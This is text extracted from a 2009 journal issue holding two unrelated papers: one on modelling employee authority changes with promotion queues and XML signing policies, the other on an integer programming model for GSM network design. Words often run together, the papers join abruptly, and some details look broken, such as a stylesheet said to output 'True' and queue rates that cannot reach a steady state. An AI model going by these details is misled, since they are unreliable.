The problem of authorization was raised in 1990 by Fischer [1] for the confirmation of the originality of a source. Russell [2] in 1994 described the problem in detail and suggested various options available to the receiver. He suggested some basic principles of authorization at source, such as auditing by the receiver, a trusted third-party originator, and self-audit. He further categorized authorization into two parts: person-based authorization and rule-based authorization. Person-based authorization uses digital signatures and certificates, whereas rule-based authorization is based on rules provided to the receiver for verification of authorization. Thomas Woo [3] in 1998 suggested the design of a distributed authorization service which parallels existing authentication services for distributed systems. In 2000, Michiharu and Satoshi [4] presented XML document security based on provisional authorization. They suggested an XML access control language (XACL) that integrates security features such as authorization, non-repudiation, confidentiality, and an audit trail for XML documents. During the period from 1996 to 2005, various types of authorization and applications such as [5, 6, 7] were suggested. In 2005, Burrows [8] presented a method for XSL/XML-based implementation of authorization rules policies by filing a patent in the United States Patent Office. He implemented an XSL/XML-based authorization rules policy on a given set of data and used an authorization rules engine, with authorization rules defined in XSL, to operate on access decision information (ADI) provided by the user. Inside the authorization rules engine, a boolean authorization rules mechanism is implemented to constrain the XSL processor to arrive at a boolean authorization decision.

When a person joins an organization, he becomes authorized to take some decisions on behalf of that organization; that is, he is given some authority to exercise. After some time, on the basis of his performance, he is promoted to a higher level and becomes eligible to exercise higher authorities. Further on, he may get another promotion, or he may leave the organization. So, during his stay in the organization, the authority of that person varies from the time he joins until he or she leaves, and he remains in the queue [10, 11, 12] for the next position. This paper presents the variation in the authorities of a person in the organization. As soon as the person gets a promotion, his or her authority database is updated to reflect the current authorities. The method implements a queuing model to analyze the people in the queue for their promotion and examines various parameters such as average waiting time.

This paper is organized as follows. Part I presents an introduction to the problem addressed; Part II explains the basics of queuing theory; Part III presents the queuing model implementation for our scheme; Part IV presents the XML policy for the user used in this system; Part V presents the authority variation when a person moves from one level of the queue to another; Part VI presents the conclusion; and Part VII presents applications and future scope.
II. QUEUING THEORY BASICS
Queuing theory [10, 11] is a mathematicalconcept which is used the application study its
various application in technology and all other
related areas. We have used this concept to study
people in organization are basically a queue of
various points for example they may be in promotion queues. When they enter in the
organization they are in the queue. When they
are inside in the organization they are in thequeue of promotion. Here we are studying the
case when they are inside the organization and
they are in the promotion queue. For example
employees from level one L1 gets promotion to
higher level two L2 and then higher and so on.But for simplicity, here we have taken only three
levels i.e. L1, L2, and L3.
So, just for brief introduction to this concept
the brief introduction of this concept is presented.
The three basic terms in queuing theory are
customers, queues, and servers.
A. Customers
Customers are generated by an input source.The customers are generated according to astatistical distribution and the distributiondescribes their interarrival times, i.e the times
between arrivals of customers. The customers join a queue. In our system customers are person joining the organization.
B. Server (Service Mechanism)
Customers are selected for service by theserver at various times. The rule on the basis of which the customers are selected is called thequeue discipline. The head of the queue is thecustomer who arrived in the queue first and tale, a
person who is in the last. In our system the server is the organization authorities.
C. Input Source
The input source is a population of individuals, and as such is called the calling
population. The calling population has a size,which is the number of potential customers to thesystem. The size can either be finite or infinite.The input source in our system is the processwhich supplies person to the organizationdepartment fro example Human ResourceProcess.
D. Queue
Queues are either infinite or finite. If a queueis finite, it holds a limited number of customers.The amount of time a customer waits in the queueis called the queuing time. The number of customers who arrive from the calling populationand join the queue in a given period of time ismodeled by a statistical distribution. In our system, we have taken the queue of people,waiting for their promotion or their authority toupgrade.
E. Queue Discipline
The queue discipline is a rule through whichcustomers are selected from the queue for
processing by servers. For example, first-come-first-served (FCFS), where the customers are
processed in the order they arrived in the queue.Most queuing models assume FCFS as the queuediscipline. We have also assumed the same
approach. In our system the queue discipline isthe rule on the basis of which the promotion of employees occur.
F. Basic Notations [10]
λn : Mean arrival rate of new customers when n customers are in the system.
μn : Mean service rate (expected number of customers completing service per unit time) when n customers are in the system.
P(i) : Probability of exactly i customers in the queueing system.
L : Expected number of customers in the queueing system.
LS : Average waiting time in the system.
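For illustration, the notation above can be exercised with the standard single-server M/M/1 steady-state formulas. This is a sketch only: the paper does not commit to a specific queuing model, and a single server requires λ < μ for stability, so the example rates below are illustrative rather than the paper's case values.

```python
# Illustrative sketch (not from the paper): steady-state metrics of an
# M/M/1 queue with constant arrival rate lam and service rate mu.
def mm1_metrics(lam, mu, i_max=5):
    """Return (P, L, Ls): P(0)..P(i_max), expected number in system,
    and mean time in system, for a stable M/M/1 queue (lam < mu)."""
    if lam >= mu:
        raise ValueError("single-server queue is unstable unless lam < mu")
    rho = lam / mu                                        # server utilization
    p = [(1 - rho) * rho ** i for i in range(i_max + 1)]  # P(i) = (1-rho)*rho^i
    L = rho / (1 - rho)                                   # expected customers in system
    Ls = 1 / (mu - lam)                                   # mean time in the system
    return p, L, Ls

p, L, Ls = mm1_metrics(lam=2, mu=6)
print(round(L, 3), round(Ls, 3))  # -> 0.5 0.25
```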
III. QUEUING MODEL IMPLEMENTATION
When a person joins an organization, he becomes authorized to take some decisions on behalf of that organization; that is, he is given some authority to exercise. After some time, on the basis of his performance in the organization, he is given a promotion and becomes eligible to exercise some higher authorities. Further, he may get a higher promotion, or he may leave the organization. So, during his stay, the authority of that person varies from the time he joins the organization until he/she leaves it. This paper presents the variation in authorities of a person in
(IJCSIS) International Journal of Computer Science and Information Security, Vol. 4, No. 1 & 2, 2009, ISSN 1947-5500
the organization. The method implements the queuing model to analyze the various people in the promotion queue and looks at parameters such as the average waiting time.
A. Assumptions
• Let us take three queues implementing three levels of employees in the organization (for simplicity we have taken only a three-level hierarchy):

L1: contains employees of the organization who have just joined,

L2: contains employees at the second level after their promotion from the first level, i.e., queue L1, and

L3: contains employees at the next higher level, promoted from the previous level, i.e., L2.
• For every level, λn denotes the rate at which persons come into the system and μn denotes the rate at which persons go out of the system.
Figure 1 below shows the various levels in the system where employees happen to be in the queue for promotion.
Figure 1. Levels of Various Queues
IV. XML POLICY FOR THE USER
The XML policy for the user contains information about the user who is signing the document. The policy may contain information such as the user's identification, his hierarchy or designation, and his authorities: whether he has the power to sign this document or not and, if yes, in what capacity.
The organization maintains a database of XML policies for verifying the proper authority of the person who is exercising his/her authority on the document. The structure of the database is shown in Table 1. The first column describes the employee's identification number given by the organization, and the second column describes the XML policies associated with the person for verifying his/her authorities.
Table 1. An authority database

Employee ID | XML policies
0           |
1           |
An example of an authorization policy [9] describing a person's signing capabilities can be:
<Policy>
<user>
<name>smith</name>
<id>1</id>
<designation>manager</designation>
<signing_limit>1000</signing_limit>
</user>
</Policy>
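As an illustration (not part of the paper), such a policy record could be checked with Python's standard xml.etree.ElementTree before allowing a signature; the routine name may_sign and the amount check are hypothetical.

```python
# Hypothetical verification sketch: look up the user in the stored XML
# policy and check the requested amount against his signing limit.
import xml.etree.ElementTree as ET

POLICY = """
<Policy>
  <user>
    <name>smith</name>
    <id>1</id>
    <designation>manager</designation>
    <signing_limit>1000</signing_limit>
  </user>
</Policy>
"""

def may_sign(policy_xml, name, amount):
    """True if the named user exists and amount is within his signing limit."""
    user = ET.fromstring(policy_xml).find("user")
    return (user is not None
            and user.findtext("name") == name
            and amount <= int(user.findtext("signing_limit")))

print(may_sign(POLICY, "smith", 800))   # -> True
print(may_sign(POLICY, "smith", 5000))  # -> False
```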
V. AUTHORITY VARIATION
When persons in an organization move from one level to another, their authority changes: for example, the authority to review documents, the authority to sign documents, or the authority to review people's performance. The authority database for a person who gets promoted should be updated. So, Table 1 records all the changes in a person's authorities; when the person exercises his/her authority, this table is consulted and the policy for that person is verified according to the following stylesheet code.
<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html"/>
<xsl:template match="/Policy">
<html>
<body>
<xsl:if test="user/name='smith'">
<xsl:if test="user/id='1'">
<xsl:if test="user/designation='manager'">
<xsl:if test="user/signing_limit='1000'">
<table border="1">
<tr bgcolor="#1acd31"><td>
Access allowed
</td></tr></table>
</xsl:if>
</xsl:if>
</xsl:if>
</xsl:if>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
OUTPUT: True
The result 'True' means that the person has exercised the right authority.
VI. CONCLUSION
We have presented the variation in the authorities of a person in an organization as he moves from one level to a higher one, that is, from one promotion queue to another. We have implemented the queuing model to analyze the various people in the promotion queue and looked at parameters such as the average waiting time. The method also implements the authority policy as a database of XML policies so that they can be consulted when taking decisions about the authority of an employee.
VII. APPLICATION AND FUTURE SCOPE
The above scheme can be applied in any organization where people exercise their authorities online rather than on paper. It is intended for environments where electronic documents are produced in almost every process and where people also exchange documents outside the organization, for example for signing contracts or making payments. In the latter case, the policy database needs to be maintained at both ends, with the policies designed so that they do not expose sensitive organization details; we consider this case an extension of the above scheme.
ACKNOWLEDGMENT
We thank Dr. I. J. Kumar, Principal, Bharati Vidyapeeth's College of Engineering, New Delhi, for his encouragement and support in carrying out this work.
IMPLEMENTATION AND RESULTS
For Case 1: λn = 6, μn = 2. The output shows the probabilities of persons in the system and the average time in the system.

For Case 2: λn = 8, μn = 3.
The snapshots below show the XML policy verifications.
Snapshot 1: Checking the Syntax of XML Code
Snapshot 2: Checking the Syntax of XML Code
REFERENCES
[1] A. M. Fischer, "Electronic Document Authorization", Proc. 13th NIST-NCSC National Computer Security Conference, pp. 62-71, 1990.
[2] S. Russell, "Audit-by-receiver paradigms for verification of authorization at source of electronic documents", Computers and Security, Vol. 13, Issue 1, February 1994, pp. 59-67.
[3] Thomas Y. C. Woo and Simon S. Lam, "Authentication for distributed systems", IEEE Computer, Jan. 1998, pp. 39-52.
[4] Michiharu Kudo and Satoshi Hada, "XML document security based on provisional authorization", Proceedings of the 7th ACM Conference on Computer and Communications Security, Athens, Greece, 2000, pp. 87-96.
[5] Patroklos G. Argyroudis and Donal O'Mahony, "Towards flexible authorization management", Proc. ISSC 2005, IEEE Computer Society, pp. 421-426.
[6] Torsten Braun and Hahnsang Kim, "Efficient authentication and authorization of mobile users based on peer-to-peer network mechanisms", International Conference on System Sciences, IEEE, 2005, p. 306.2.
[7] E. Bertino, F. Buccafurri, E. Ferrari, and P. Rullo, "An Authorization Model and Its Formal Semantics", Proc. 5th European Symposium on Research in Computer Security, pp. 127-142, September 1998.
[8] Burrows, "Method and apparatus for XSL/XML based authorization rules policy implementation", United States Patent Application 2005-0102530A1.
[9] J. Mukherjee and W. Atwood, "XML Policy Representation for Secure Multicast", Proceedings of the IEEE SoutheastCon 2005 Conference, Fort Lauderdale, 8-10 April 2005, pp. 580-587.
[10] Other Notation, http://www.andrewferrier.com/oldpages/queueing_theory/Andy/other_notation.html
[11] Basic Terminology of Queueing Theory, http://www.andrewferrier.com/oldpages/queueing_theory/Andy/terminology.html
[12] Sanjay K. Bose, "An Introduction to Queueing Systems".
AUTHORS PROFILE
M. N. Doja is a professor in the Computer Science and Engineering Department, Jamia Millia Islamia, New Delhi, India. He has been the Head of the Department and Chairperson of the Research and Development Board of the same department for several years.

Dharmender Saini received his B.Tech. in Computer Science from T.I.T&S in 1999 and his M.Tech. in Computer Science and Engineering from Guru Jambheshwar University, Hisar, in 2006. During 2000-2007 he was a Lecturer and Assistant Professor at Bharati Vidyapeeth College of Engineering. He is presently pursuing a PhD at Jamia Millia Islamia University, New Delhi, India.
A Novel Model for Optimized GSM Network Design
Alexei Barbosa de Aguiar, Plácido Rogério Pinheiro, Álvaro de Menezes S. Neto, Ruddy P. P. Cunha, Rebecca F. Pinheiro
Graduate Program in Applied Informatics, University of Fortaleza
Av. Washington Soares 1321, Sala J-30, Fortaleza, CE, Brazil, 60811-905
alexei@verde.com.br, placido@unifor.br, netosobreira@edu.unifor.br, ruddypaz@hotmail.com, becca.pin@gmail.com
Abstract – GSM networks are very expensive. The network design process requires too many decisions, in a combinatorial explosion. For this reason, the larger the network, the harder it is to achieve a totally human-based optimized solution. The BSC (Base Station Controller) nodes have to be geographically well allocated to reduce transmission costs. There are decisions of association between BTS and BSC that impact the correct dimensioning of these BSC. The choice of BSC quantity, and of models capable of carrying the accumulated traffic of the affiliated BTS nodes, in turn reflects on the total cost. In addition, the last component of the total cost is due to the transmission links from the BSC nodes to the MSC. These trunks have a major significance, since the number of required E1 lines is larger than for the BTS to BSC links. This work presents an integer programming model and a computational tool for designing GSM (Global System for Mobile Communications) networks, regarding the BSS (Base Station Subsystem), with optimized cost.
Key words: GSM mobile network design, cellular
telephony, Integer Programming (IP), Operations
Research.
I. INTRODUCTION
GSM mobile networks have a very sophisticated architecture composed of different kinds of equipment [14].
One of the most important of these, located at the core of the network, is the MSC (Mobile Switching Center). The MSC has many vital duties, such as registering and unregistering MS (Mobile Stations), analyzing call destinations, routing calls, handling signaling, locating MS through paging, controlling handover, and compressing and encrypting voice. Indeed, it is one of the most expensive components of the network.
The HLR (Home Location Register) works as a subscriber database, storing information concerning the subscriber's state, location, parameters and service data. It is constantly queried and updated by the MSC.
The SGSN (Serving GPRS Support Node) is analogous to the MSC but is dedicated to packet data transmission services instead of handling voice calls. Many of its mechanisms are identical or similar to those of its voice counterpart, and it interacts with the HLR as well.
Hierarchically below each MSC we have the BSC (Base Station Controller) nodes. They are not present in IS-136 (TDMA) networks. The BSC reduces the cost of the network. One reason is that it concentrates the processing intelligence of the BTS (Base Transceiver Station) nodes, which are the most numerous and spread-out pieces of equipment. Another impacting factor is that, although the BSC depends on the MSC for many activities, it is the first-layer telephony switch, geographically concentrating traffic. This means that the trunks that carry the traffic from BSC to MSC are statistically dimensioned based on Erlang's traffic theory instead of in a one-by-one channel fashion.
The BTS radiates the RF (Radio Frequency) signal to the mobile phones and receives their signal back. Antennas on the tops of towers or buildings radiate this RF, creating coverage areas called cells. The geographical allocation of BTS is guided by RF coverage and traffic demand.
Fig.1. Mobile Network Design
The focus here will be concentrated on the BSS (Base Station Subsystem), which faces the radio resources towards the MS. The BSS is the group of equipment and software that integrates the BSC
nodes, the BTS nodes and the MSC. The transmission network plays an important role in linking them all.
The network design usually starts at the cell planning department. The required coverage area is given to the cell planning engineering team, and the traffic is estimated by geographic region. The traffic density variation between regions can be very wide.
When coverage is the goal, RF engineers look for sites with high altitudes, free of obstacles, to reach larger distances. On the other hand, when the goal is traffic, hotspots are covered with fully equipped BTS nodes. Their radio channels' power is configured lower, and the RF radiation is directed toward the nearby ground with a higher antenna tilt angle.
In urban areas the BTS proximity is limited by interference, since there is a limited number of RF channels and they are repeated over and over along the coverage area. The BTS sites are allocated in a triangular grid pattern where possible. This allocation is due to the coverage pattern of the three groups of antennas, disposed with 120° angles between them.
Once all BTS placements are determined, with their corresponding channel dimensioning, it is possible to plan how many BSC nodes are needed, which capacity each one should have, and their geographical allocation. All these factors are highly related to the choices of which BTS nodes are linked to which BSC nodes.
The links between BTS and BSC are E1 lines that hold voice channel slots. They are configured deterministically on a one-to-one basis, matching the radio channel slots of the BTS. This is called the Abis interface.
On the other hand, the trunks that link a BSC to the MSC are E1 lines dimensioned by the total traffic from all of its BTS. This is called the A interface. These trunks are similar to trunks between two MSC or other conventional telephony switches. The voice channels in these trunks are seized statistically on demand, and the total number of busy channels varies during the day. All calls must pass through the MSC, even when both subscribers are very close, in the same BTS and BSC area.
The Erlang B formula calculates the blocking probability (or congestion, or Grade of Service, GoS) for a given number of resources (voice channels, normally) and offered traffic.
Each one of the three variables in this formula can be calculated from the other two, depending on the context. The percentage of calls that are lost can be calculated for a given number of voice channels available in some equipment and the measured traffic. To solve a congestion scenario, this formula provides the number of channels that would be necessary to carry the traffic at a maximum tolerable GoS (2%, for instance). Another possibility is to calculate how much traffic can be carried with a given number of channels and the desired GoS.
The Erlang B formula, eq. (1), is shown below:

e_b = (a^n / n!) / ( Σ_{i=0}^{n} a^i / i! )        (1)

where e_b is the probability of blocking, also known as GoS, n is the number of resources (voice channels in this case) and a is the amount of traffic offered in Erlangs.
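For large n, eq. (1) is numerically awkward because of the factorials; the algebraically equivalent recursion B(0) = 1, B(k) = a·B(k-1)/(k + a·B(k-1)) is the usual way to evaluate it. A short sketch follows, including the inverse use described above (channels needed for a maximum tolerable GoS):

```python
# Erlang B via the standard numerically stable recursion, equivalent to eq. (1).
def erlang_b(n, a):
    """Blocking probability for n channels and offered traffic a (Erlangs)."""
    b = 1.0
    for k in range(1, n + 1):
        b = a * b / (k + a * b)
    return b

def channels_for_gos(a, gos):
    """Smallest number of channels whose blocking does not exceed gos."""
    n, b = 0, 1.0
    while b > gos:
        n += 1
        b = a * b / (n + a * b)
    return n

print(channels_for_gos(10, 0.02))  # -> 17, the classic table value for 10 E at 2%
```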
Besides channel resources, some BSC have a deterministic way of allocating other kinds of resources. When a new radio channel is installed in a BTS, some required resources (processor and memory, for instance) are associated with this new radio channel in a fixed way. These resources are committed to the radio channel even when it is idle. Thus, this kind of BSC has a fixed maximal capacity, for instance, 4096 radio voice channels (slots).
Some more modern BSC use a pool of resources that are associated with radio voice channels on demand, when a call is made. This feature increases the BSC capacity. With this type of BSC, its maximum capacity cannot be determined by its number of radio channels, but by its traffic in Erlangs. For instance, the 4096 radio voice channel BSC could be equivalent to a 4058 Erlang (at 2% GoS) BSC model with a virtually unlimited number of radio voice channels, depending on their traffic demand.

So the Abis interface, from BTS to BSC, is made of deterministic channels in E1 lines. These lines waste transmission resources. The A interface, from BSC to MSC, is made of statistical channels in E1 lines. These lines are more efficient.
It was said that BSC reduce transmission costs, but they themselves represent network design costs. It is a design tradeoff. The more BSC we distribute along the coverage area, the lower the transmission costs, since the distances between BTS and BSC decrease. On the other hand, the BSC has its acquisition cost. The balance between these two costs is reached with
the optimal geographical allocation of the BSC, associated with the correct choice of model, with its respective capacity and cost.
A typical GSM network has hundreds or thousands of BTS and tens or hundreds of BSC. The human capacity for designing efficient networks of such magnitudes is very limited, and the network costs are high. The use of computational tools can reduce these costs radically. That is what is proposed here.
II. THE INTEGER PROGRAMMING MODEL
This is an Integer Programming model [8] capable of minimizing the total network cost and providing the design solution that achieves this minimal cost.
T = {t_1, t_2, t_3, ..., t_m}  BTS nodes;
B = {b_1, b_2, b_3, ..., b_n}  BSC nodes;
W = {w_1, w_2, w_3, ..., w_o}  BSC models;
C = {c_0, c_1, c_2, ..., c_p}  Link capacities;
x_ij : decision variable for link allocation between BTS node i and BSC node j;
y_lc : decision variable for choosing the capacity c of E1 (2 Mbps) lines between BSC l and the MSC;
z_lw : decision variable for the choice of model w for BSC l;
ct_ij : link cost between BTS i and BSC j nodes in an analysis time period;
cm_lc : link cost of capacity c between BSC l and the MSC in an analysis time period;
cb_w : BSC model w acquisition cost, considering an analysis time period;
a_i : BTS i traffic demand in Erlangs;
f_c : link capacity c in Erlangs;
e_w : BSC model w traffic capacity in Erlangs.
A. Objective Function
The objective function, eq. (1), minimizes the total cost of links between BTS and BSC, plus the cost of E1 lines between BSC nodes and the MSC, plus the total cost of BSC acquisition:

minimize   Σ_{i∈T} Σ_{j∈B} ct_ij x_ij + Σ_{l∈B} Σ_{c∈C} cm_lc y_lc + Σ_{d∈B} Σ_{k∈W} cb_k z_dk        (1)
B. Restrictions
In eq. (2), each BTS must be connected to one and only one BSC:

Σ_{j∈B} x_ij = 1,   ∀ i ∈ T        (2)

In eq. (3), the y_lc dimensioning is made; it allows all the traffic from the BTS assigned to a BSC l to flow over its links:

Σ_{i∈T} a_i x_il ≤ Σ_{c∈C} f_c y_lc,   ∀ l ∈ B        (3)

In eq. (4), the BSC dimensioning is made according to the given models and the total traffic demand:

Σ_{i∈T} a_i x_ij ≤ Σ_{k∈W} e_k z_jk,   ∀ j ∈ B        (4)

x_ij ∈ {0,1},   ∀ i ∈ T, j ∈ B        (5)
y_lc ∈ {0,1},   ∀ l ∈ B, c ∈ C        (6)
z_lw ∈ {0,1},   ∀ l ∈ B, w ∈ W        (7)
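A toy brute-force check can make the model concrete by validating the assignment constraint and the BSC dimensioning on a tiny instance. Everything numeric below is invented for illustration (the paper solves real instances with OPL/CPLEX), and the E1-capacity choice y_lc is simplified into the link costs:

```python
# Toy brute-force sketch of the model: 3 BTS, 2 candidate BSC sites,
# 2 BSC models. All data are made-up numbers for illustration only.
from itertools import product

T = [0, 1, 2]                                # BTS indices
B = [0, 1]                                   # candidate BSC sites
a = [30.0, 50.0, 20.0]                       # BTS traffic demands (Erlangs)
ct = [[1.0, 4.0], [3.0, 2.0], [5.0, 1.0]]    # BTS-BSC link costs ct_ij
models = [(60.0, 10.0), (120.0, 18.0)]       # (capacity e_w, cost cb_w)

best = (float("inf"), None)
for assign in product(B, repeat=len(T)):     # x_ij: each BTS picks one BSC (eq. 2)
    cost = sum(ct[i][assign[i]] for i in T)
    feasible = True
    for j in B:
        load = sum(a[i] for i in T if assign[i] == j)
        if load == 0:
            continue                         # unused site buys no BSC
        fitting = [cb for e, cb in models if e >= load]   # capacity check (eq. 4)
        if not fitting:
            feasible = False
            break
        cost += min(fitting)                 # cheapest model that carries the load
    if feasible and cost < best[0]:
        best = (cost, assign)

print(best)  # -> (25.0, (1, 1, 1)): all BTS on site 1 with the large model
```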
III. MODEL APPLICATION
This model has some issues in real applications that must be observed.
The set of BTS nodes T is known beforehand, because RF engineers make its design as the first step. Its geographical locations are determined by coverage and traffic requirements. Its traffic demand can be known beforehand by measuring another mobile network (an old one that is being replaced, or another overlaid technology such as TDMA (Time Division Multiple Access) or CDMA (Code Division Multiple Access)). When such a data source is not available, the traffic demands can be estimated from the average subscriber traffic and a forecast of the number of subscribers based on population and marketing studies.
The set of BSC nodes B can be generated based on all feasible site possibilities. The sites that will have a BTS are good candidates, since their space will already be available by rental or purchase. Other company buildings can be added to this set. The set B represents all possibilities, and not necessarily the actual BSC allocations. The more options the set B has, the better the allocation of the needed BSC nodes tends to be.
The set W contains the available models of BSC. Normally a BSC manufacturer offers different choices of models. Each one has its capacity in Erlangs (as modeled here) and its price.
The set C is a table of traffic capacities for an integer quantity of E1 lines. Each E1 line has a number of timeslots allocated for voice, out of the 31 available. The other timeslots are used for signaling and data links. Thus, the first E1 line may have a different number of voice timeslots than the second E1 line, and so on. Each voice timeslot carries 4 compressed voice channels, so-called sub-timeslots.
The elements of the set C are calculated by the inverse Erlang B formula, taking the number of voice channels and the defined GoS as input and the traffic as output. The first element of set C is 0 E1 lines, which leads to 0 Erlangs. The second element is 1 E1 line, with its traffic calculated for 4 times the number of timeslots allocated for voice in this E1 line, because each timeslot has 4 sub-timeslots. The third element is 2 E1 lines, with the traffic calculated for 4 times the number of voice timeslots in both E1 lines, and so on. The size of the set C is determined by the maximal capacity of the largest BSC model.
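The construction of set C can be sketched as follows. The uniform 30 voice timeslots per E1 line and the 0.1 Erlang search step are assumptions for illustration; as noted above, the real per-line timeslot counts depend on the signaling allocation.

```python
# Sketch of building set C: element k holds the traffic (Erlangs at 2% GoS)
# carried by k E1 lines, each assumed to carry 30 voice timeslots x 4 sub-timeslots.
def erlang_b(n, a):
    """Blocking probability for n channels and offered traffic a (Erlangs)."""
    b = 1.0
    for k in range(1, n + 1):
        b = a * b / (k + a * b)
    return b

def traffic_at_gos(channels, gos=0.02):
    """Inverse Erlang B: largest traffic (0.1 Erlang steps) with blocking <= gos."""
    a = 0.0
    while erlang_b(channels, a + 0.1) <= gos:
        a += 0.1
    return round(a, 1)

VOICE_TS_PER_E1 = 30          # assumed: 31 timeslots minus signaling allocation
C = [traffic_at_gos(k * VOICE_TS_PER_E1 * 4) for k in range(0, 5)]
print(C)                      # C[0] is 0.0 Erlangs for 0 E1 lines
```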
The link costs ct and cm in a given period of analysis must be determined by the transmission network ownership and/or contract. If the transmission network belongs to the mobile company itself, its cost can be determined by a set of distance ranges or as a constant times the distance, plus a fixed equipment cost. If the mobile company contracts transmission lines from another company, the costs must be calculated based on the specific contractual rules. For instance, discounts based on quantity can be applied.
This integer programming model can be adapted to work with BSC that have a maximum radio channel capacity, instead of a maximum traffic capacity as presented.
IV. COMPUTATIONAL RESULTS
Simulations were made with many network sizes. The largest network size that could be solved in a reasonable time has about 50 sites. The different generated data caused big differences in the solving time. For instance, the smallest solving time for 50 sites, with 3201 integer variables and 150 restrictions, was 42.04 seconds, while other equivalent problem instances caused the solver to spend more than 30 minutes.
The data was generated using the following assumptions:

• The transmission cost was calculated by multiplying the link distance by a constant. Local market cost approximations were used. The cost of n E1 lines on the same link is assumed to be n times the cost of each E1 line.

• The BTS and MSC site geographical locations were generated randomly. For each BTS site, a BSC site candidate was generated. The traffic of each BTS was generated randomly from 0 to 80 Erlangs, which is the approximate value that a BTS can handle with 1 E1 line.

• The set C was generated with 41 values, from 0 E1 lines to 40 E1 lines. For each capacity, the corresponding traffic was calculated according to the model application section (III).

• Three BSC models were used in these simulations: small, medium and large, with 512, 2048 and 4096 Erlangs of capacity respectively. Each one had an acquisition cost compatible with the local market reality.
The OPL integrated modeling environment and the CPLEX 10.0 solver library [9] from ILOG Inc. were used in the simulations. OPL ran on a 64-bit Intel Core 2 Quad processor with a 2.4 GHz clock and 4 GB of RAM.
Despite the fact that 50 sites is a very small problem instance compared to the hundreds or even thousands of sites of real mobile networks, the simulations showed that this model works properly for the desired purpose. Varying the costs, more or fewer BSC were allocated. Each BSC model was correctly chosen according to the total traffic demanded by all BTS allocated to that BSC. The distances were minimized indirectly because of the linear cost per kilometer. The trunk between BSC and MSC was dimensioned to carry the total traffic demanded by the BSC, and its distance to the MSC was effectively considered, since the number of E1 lines was greater than one.
Twenty problem instances were created and solved for each number of BTS sites, varying from 5 to 50 in steps of 5. The data were generated randomly following the premises described in this section. The results are shown in Table 1.
V. SCALABILITY ANALYSIS
Due to the wide range of randomly generated values, the problem instances have very high complexity variations. Thus, there were problem instances with 40 BTS that could not be solved within a reasonable time threshold. Sometimes the solver crashed because of lack of memory. But, for the same reason, there are problem instances larger than 50 BTS that can be solved in a time interval even smaller than some particular instances of 40 BTS.
The model proposed here is an Integer Programming one. The discrete nature of the variables requires an algorithm like branch-and-bound, branch-and-cut or others. This sort of algorithm has exponential complexity, which limits the largest instance size that can be handled. Actual networks often have hundreds of BTS, which is far beyond the range of this exact method. Aguiar and Pinheiro [13] used the Lingo solver library, and it was not able to handle problem instances larger than 40 BTS. The adoption of CPLEX [9] expanded this boundary to 50 BTS, but it remains too small.
A least-squares non-linear regression of the average times was made to determine the observed asymptotic complexity function. It is shown in eq. (8) and fig. 2.
The key to breaking this limitation and making big network designs feasible is to use approximate approaches. Methodologies such as Lagrangean relaxation with the simple subgradient, bundle methods and space dilatation methods (Shor et al. [6, 7]) can be used. Rigolon et al. [3] show that the use of this tool in the first model extends the size of the largest mobile network that can be designed. A framework that hybridizes exact methods and meta-heuristics has presented good results in expanding these boundaries in other classes of problems. Nepomuceno, Pinheiro and Coelho [11] used this framework to solve container loading problems. In the same problem category, Pinheiro and Coelho [12] presented a variation of the implementation to work with cutting problems.
VI. CONCLUSION
This work gave a solution to the BSS network design problem of mobile GSM carriers, capturing its essence in a mathematical model. In the introduction section, some telecommunications background was given to help in understanding the model. Then, the model was presented and explained.
Table 1 - Results
After the model presentation, its application was shown, explaining how to relate technical details of the real world to the model's data generation.

In the computational results section, size and performance simulations were described. The scalability was analyzed, leading to some conclusions. This model by itself cannot be used on real networks because of its size limitation. Simulations with small real networks cannot show the optimization potential, because small networks can be well designed by human intuition and have smaller costs. Some methodology must be applied to extend the size of the problems to hundreds or thousands of BTS sites. Then the optimization gain can be very effective.
BTS | Var. | Const. | Density | Avg. Time | Std. Deviation
 5  |   96 |   15   |  9.72%  |      50.0 |     12.773
10  |  241 |   30   |  5.95%  |      40.0 |      8.208
15  |  436 |   45   |  4.43%  |     332.0 |     28.802
20  |  681 |   60   |  3.57%  |     853.5 |     86.418
25  |  976 |   75   |  3.01%  |    3561.5 |    371.594
30  | 1321 |   90   |  2.60%  |   19689.0 |   2872.227
35  | 1716 |  105   |  2.29%  |   46287.5 |   4890.274
40  | 2161 |  120   |  2.05%  |  600431.1 |  80263.118
45  | 2656 |  135   |  1.86%  |  363032.5 |  44981.655
50  | 3201 |  150   |  1.70%  |  752724.0 |  87873.235
y = 0.851 e^(0.244x)        (8)
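A fit of this form can be reproduced by ordinary least squares on ln(y) over the Table 1 averages. The exponent comes out at the printed 0.244; the prefactor depends on the fitting tool and the time units, so it is printed rather than asserted:

```python
# Log-linear least-squares fit of y = A*exp(B*x) to the Table 1 averages.
import math

xs = [5, 10, 15, 20, 25, 30, 35, 40, 45, 50]
ys = [50.0, 40.0, 332.0, 853.5, 3561.5, 19689.0,
      46287.5, 600431.1, 363032.5, 752724.0]

def fit_exponential(xs, ys):
    """Return (A, B) for y = A*exp(B*x), fitted by least squares on ln(y)."""
    n = len(xs)
    lys = [math.log(y) for y in ys]
    mx = sum(xs) / n
    my = sum(lys) / n
    sxx = sum((x - mx) ** 2 for x in xs)
    sxy = sum((x - mx) * (ly - my) for x, ly in zip(xs, lys))
    B = sxy / sxx                      # slope of ln(y) vs x
    A = math.exp(my - B * mx)          # intercept back-transformed
    return A, B

A, B = fit_exponential(xs, ys)
print(round(A, 3), round(B, 3))
```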
Fig. 2. Average time versus instance size
BIBLIOGRAPHICAL REFERENCES
[1] P. Kubat and J. MacGregor Smith, "A multi-period network design problem for cellular telecommunication systems", European Journal of Operational Research, 134:439-456, 2001.
[2] P. Kubat, J. MacGregor Smith and C. Yum, "Design of cellular networks with diversity and capacity constraints", IEEE Transactions on Reliability, 49:165-175, 2000.
[3] A. A. Rigolon, P. R. Pinheiro, E. M. Macambira, L. O. R. A. Ferreira, "Approximate Algorithms in Mobile Telephone Network Projects", International Conference on Telecommunications and Networking, Bridgeport, Springer Verlag, 2005, v. XV, pp. 234-347.
[4] S. I. M. Rodrigues, "Relaxação Lagrangeana e subgradientes com dilatação de espaço aplicados a um problema de grande porte" (Lagrangean relaxation and subgradients with space dilatation applied to a large-scale problem), RJ, 1993.
[6] N. Z. Shor, "Utilization of the operation of space dilatation in the minimization of convex functions", Cybernetics, 1:7-15, 1970.
[7] N. Z. Shor and N. G. Zhurbenko, "A minimization method using the operation of extension of the space in the direction of the difference of two successive gradients", Cybernetics, 7(3):450-459, 1970.
